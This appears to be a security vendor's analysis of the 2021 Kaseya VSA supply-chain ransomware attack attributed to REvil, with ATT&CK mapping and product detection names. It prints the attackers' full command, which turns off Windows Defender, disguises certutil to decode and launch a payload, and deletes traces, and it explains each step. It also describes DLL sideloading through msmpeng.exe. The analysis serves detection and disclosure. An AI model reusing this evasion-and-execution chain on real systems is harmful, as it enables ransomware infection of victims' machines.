Kaseya VSA Supply Chain Ransomware Attacks (REvil Gang)

The ransomware attack by leveraging a vulnerability in VSA (a cloud-based management service that can manage various patches and perform client monitoring) made by Kaseya, an IT solutions developer for enterprises and managed service providers (MSPs), turned out to be BlueCrab (Sodinikibi) ransomware that is being actively distributed in korea as well. The figure below shows a desktop infected with the ransomware, which flashes the same screen like that of BlueCrab being widely spread in Korea. Unlike BlueCrab well-known in Korea, which indiscriminately targets normal users using JavaScript type (*.JS) via search engine sites such as Google and MS Bing, recently confirmed cases were targeted attacks, and they showed a difference in the operation method as well.

Figure 1. Desktop when infected by ransomware distributed via VSA, Kaseya

The REvil group which is assumed to be behind the attacks attacked through Kaseya’s supply chain for effective distribution. During the infection process, it used normal MS files to neutralize Windows Defender and bypass anti-malware solutions, then encrypting files discreetly.
The detailed infection information is as follows.

  • Initial-Access: Supply Chain Compromise (TID: T1195)
    Exploits VSA vulnerability of Kaseya to create agent.crt file (base64 encoding file) in C:\kworking folder
  • Execution: Command and Scripting Interpreter (TID: 1059)
    Executes powershell command by running Kaseya’s AgentMon.exe
  • Defence Evasion: Impair Defenses (TID: 1562) & Masquerading (TID: 1036) & Obfuscated Files or Information (TID: 1027) & Indicator Removal on Host (TID: 1070)
“C:\WINDOWS\system32\cmd.exe” /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Table 1. Executed powershell command

When such a powershell command is executed, anti-malware product V3 can detect the ransomware in advance through the behavior detection feature with the detection alias Execution/MDP.Behavior.M3792. The detailed features and explanations of the command are as follows:

  • DisableRealtimeMonitoring: Disables Windows Defender’s real-time protection
  • DisableIntrusionPreventionSystem: Disables Windows Defender’s download file scanning
  • DisableScriptScanning: Disables Windows Defender’s script scanning
  • EnableControlledFolderAccess Disabled: Allows access to controlled folders
  • EnableNetworkProtection AuditMode –Force: Disables network protection mode
  • MAPSReporting Disabled: Disables Microsoft Active Protection Service report
  • SubmitSamplesConsent NeverSend: Disables Windows Defender’s automatic sample submission
  • copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe: Copies cert.exe in normal certutil.exe windows path
  • echo %RANDOM% >> C:\Windows\cert.exe: Places random bytes behind copied cert.exe file to bypass anti-malware’s certutil.exe detection
  • C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe: Decrypts obfuscated file created with vulnerability (agent.crt → agent.exe)
  • del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe: Deletes both obfuscated file and copied certutil.exe, then runs ultimately decrypted exe file

  • Persistence: Hijack Execution Flow (TID: 1574)
    The exe file creates a MS normal file (msmpeng.exe) and dll of BlueCrab features (mpsvc.dll) in the %temp% when it is executed. When msmpeng.exe is run, it calls ServiceCrtMain of mpsvc.dll. The dll created by the attacker equips ransomware features in the function, so the malicious behavior is performed by the normal msmpeng.exe that loaded the dll.
Figure 2. Operation method of ransomware distributed via VSA, Kaseya

It is likely that the previous process was executed to bypass anti-malware detection with behaviors of the normal process msmpeng.exe. Besides file detection, V3 products can detect the malware with the ‘process memory scan’ feature the moment the ransomware DLL module (mpsvc.dll) is executed. MDS and EDR products can also detect BlueCrab ransomware with the same operation method without any issue.

V3 Detection Status

  • Data/BIN.EncPe (2021.07.03.03)
  • Ransomware/Win.Sodinokibi (2021.07.03.03)
  • Ransomware/Win.REvil (2021.07.03.03)
  • Execution/MDP.Behavior.M3792(Behavior Detection 2021.07.10.00)
  • Ransomware/Win.BlueCrab.XM120(Memory Scan 2021.07.09.03)

[EDR Product Detection Screen]

[MDS Product Detection Status]

* Reference


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 2 votes
Article Rating
Notify of

Inline Feedbacks
View all comments